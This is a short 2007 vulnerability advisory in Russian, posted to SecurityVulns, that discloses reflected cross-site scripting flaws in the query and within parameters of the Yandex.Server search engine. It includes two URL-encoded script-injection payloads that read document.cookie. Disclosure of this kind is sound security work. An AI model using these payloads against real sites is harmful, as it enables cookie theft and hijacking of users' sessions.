Vulnerabilities in Yandex.Server

2007-07-15T00:00:00
ID SECURITYVULNS:DOC:17507
Type securityvulns
Reporter Securityvulns
Modified 2007-07-15T00:00:00

Description

Здравствуйте 3APA3A!

Сообщаю вам о найденных мною Cross-Site Scripting уязвимостях в локальном поисковике Яndex.Server.

Уязвимости в параметрах query и within (в главном скрипте).

XSS:

http://site/search/?query=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/search/?within=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

О данных уязвимостях я писал в рамках моего проекта Month of Search Engines Bugs: http://websecurity.com.ua/category/moseb/

Дополнительная информация о данных уязвимостях у меня на сайте:

Уязвимости в поиске Яndex.Server http://websecurity.com.ua/677/ Уязвимости в Яndex.Server http://websecurity.com.ua/952/ MOSEB-07 Bonus: Vulnerabilities in Yandex.Server http://websecurity.com.ua/1018/

Best wishes & regards, MustLive Администратор сайта http://websecurity.com.ua